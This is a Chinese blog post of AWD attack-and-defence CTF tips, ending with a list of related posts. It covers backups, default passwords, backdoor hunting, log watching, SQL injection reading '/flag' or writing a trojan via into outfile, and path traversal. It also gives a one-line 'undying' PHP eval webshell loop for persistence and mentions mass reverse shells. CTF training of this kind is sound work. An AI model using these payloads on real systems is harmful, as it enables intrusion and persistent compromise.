1.数据备份

比赛开始第一时间备份，备份网站目录及数据库，一般在 /var/www/html 目录。

一是为了dump下来，用D盾查杀存在的后门；安装sublime全文搜索关键字

二是为了比赛出现异常或恶意破坏进行还原，避免靶机宕机被扣分；

三要审计下有没有高危命令执行函数，进行后期加固，以及有空余时间或专门安排一个人审计下基础漏洞用来做攻击。

命令执行函数 exec()、passthru()、system()、 shell_exec()、popen() 等;代码执行函数：eval()、assert()、preg_repace()、uasort() 等；文件包含函数 include() 、require() 等，用正则匹配 grep -r "@eval" /www/，找到后注释掉。

1.备份源码，注意隐藏文件使用图像化工具连接ssh后，推荐用winscp,准备centos7.9lamp、ubuntu20.04lamp

tar czvf newfile.tar.gz SOURCE  压缩 zxvf

2.备份数据库，   1）本地还原  2）查看后台账号密码 3）查看关闭数据库远程，推荐adminer.php

mysqldump –u root –p mydatabase > mydatabase_out.sql;

3.恢复备份，在mysql终端下执行：

命令格式：source FILE_PATH

source ~/db.sql

或者在shell下执行

shell> mysqldump -h host -u root -p dbname < dbname_backup.sql

2.弱口令

大多数情况下，所有队伍的Web后台、phpmyadmin等服务的管理密码都一样，立马快速检查修改自己密码，并利用此进行攻击。一般默认密码为 admin/admin, admin/123456, test/test，如果被其他队伍改了那就gg了。

3.查找后门

对备份web目录进行后门查杀，脚本获取webshell并快速提交

4.监测攻击payload

tail -f *.log，看日志，不言而喻，抓他们的payload并利用。

5.常见漏洞

常见的漏洞包括SQL注入、文件包含、文件上传、命令执行等。

（1）sql注入漏洞

比赛一般没有防护（除非选手安装了防御脚本），可直接通过 --sql-shell 执行 select load_file(‘/flag’); 得到flag，也可以利用 into outfile 写木马维持权限。

（2）本地文件包含或目录遍历

直接通过 ../../../../../flag 获取。

6.权限维持

（1）不死马

直接linux执行：

while true;do echo '<?php eval($_POST["x"]);?>' > x.php;sleep 1;done

7.防御方法

1. waf
2. 文件监控
3. 克制不死马、内存马

使用条件竞争的方式，不断循环创建和不死马同名的文件和文件夹

8.批量反弹shell

Reverse Shell Manager

9.批量文件上传

https://github.com/edwardchoijc/ctf-toolkit/tree/master/batch_upload_file

AWD攻防技巧（水文）相关推荐

1. 浅谈AWD攻防赛的生存攻略

   AWD 规则 AWD:Attack With Defence,即攻防对抗,比赛中每个队伍维护多台服务器(一般两三台,视小组参赛人数而定),服务器中存在多个漏洞(web层.系统层.中间件层等),利用漏洞 ...

2. CTF线下AWD攻防模式的准备工作及起手式

   作为大一萌新我并没有打过AWD,可能我做梦都没有想到人生的第一场AWD是DEFCON CHINA吧~(滑稽 我自己在服务器上搭了一个cms来模拟AWD场景. 0X01 改ssh密码 官方在给出服务器密 ...

3. CTF线下AWD攻防步骤总结

   Hello,我是普通Gopher,00后男孩,极致的共享主义者,想要成为一个终身学习者.专注于做最通俗易懂的计算机基础知识类公众号.每天推送Golang技术干货,内容起于K8S而不止于K8S,涉及Do ...

4. CTF线下赛AWD攻防准备

   CTF线下赛AWD攻防准备 最近发现一篇博客.感觉对CTF线下赛-AWD模式,总结比较好.于是学习了解了一下,为了方便寻找,把这篇博客复制了过来,并补充了点... 1.赛制流程:攻防模式(AWD)常见 ...

5. ctf线下AWD攻防赛学习笔记

   Hello,我是普通Gopher,00后男孩,极致的共享主义者,想要成为一个终身学习者.专注于做最通俗易懂的计算机基础知识类公众号.每天推送Golang技术干货,内容起于K8S而不止于K8S,涉及Do ...

6. 安卓刷量技术揭秘(二) 高级攻防技巧

   标 题: [原创]安卓刷量技术揭秘(二) 高级攻防技巧 作 者: ckis 时 间: 2016-10-02,00:28:27 链 接: http://bbs.pediy.com/showthread. ...

7. 黑客攻防技巧：2分钟入侵网站全程实录（组图）

   说起流光.溯雪.乱刀,可以说是大名鼎鼎无人不知无人不晓,这些都是小榕哥的作品.每次一提起小榕哥来,我的崇拜景仰就如滔滔江水,连绵不绝 ~~~~(又来了!) 让我们崇拜的小榕哥最新又发布了SQL注入工具 ...

8. AWD线下攻防平台搭建

   AWD线下攻防平台搭建 步骤索引 AWD线下攻防平台搭建 换源 先将更新源备份一下 在命令行打开sources.list 修改sources.list文件,这里选择改成阿里镜像源 更新 升级 清理安装 ...

9. AWD 线下攻防生存之道（Web 方向）

   随着网络安全的热门,CTF 比赛也如春笋般崛起.AWD 无疑使 CTF 比赛中最有趣的环节.本 Chat 讲会讲解 AWD 线下比赛中的攻防之道,带你快速的入门 AWD 攻防,体会"HACK ...

最新文章

1. python导入txt为dataframe-Python提取TXT数据转化为DataFrame
2. 【转】ASP中的SQL注入
3. PST文件的读取（待整理）
4. CSS基础笔记（w3school）
5. hbasehlog_HBase原理--RegionServer核心组件之HLog
6. 嘉年华专访 | 我有故事，你有酒吗？
7. 毕业论文范文计算机,计算机毕业论文范文参考
8. windows server 2008远程桌面轻松搞定
9. javascript之dom详细笔记加练习
10. laravel 自定义函数
11. Mysql学习之三. NLJ和BLN介绍
12. 学无止境，京东活动自动领取脚本
13. 深入浅出计算机组成原理：冒险和预测（一）-hazard是“危”也是“机（第22讲）...
14. 蓝桥杯2018年真题(4)动态规划摔手机
15. AI绘画绘图流量主小程序开发
16. 借助Docker hub自己手动制作镜像（以Nginx镜像为例）
17. 人工智能大作业——五子棋
18. Service ‘MongoDB Server‘ (MongDB) failed to start. Verify that you have sufficient privileges to...
19. Android-Ble蓝牙开发Demo示例–扫描,连接,发送和接收数据
20. SpringCloud（H版以及Alibaba版本）的学习笔记（三）

热门文章

1. linux配置和查看主机名
2. 在python中设置静态变量
3. 【微信小程序】shiro安全登录界面实现
4. linux下文件压缩、解压缩方法（tar）
5. spring配置hibernate的sessionFactory
6. go(gin框架)session底层使用redis实现(gorilla/sessions和gin-contrib/sessions)
7. ant的下载与安装（一）
8. vue-video-play使用方法
9. 《Web性能测试实战》性能测试用例模板
10. Qt扫盲-QSqlQuery理论总结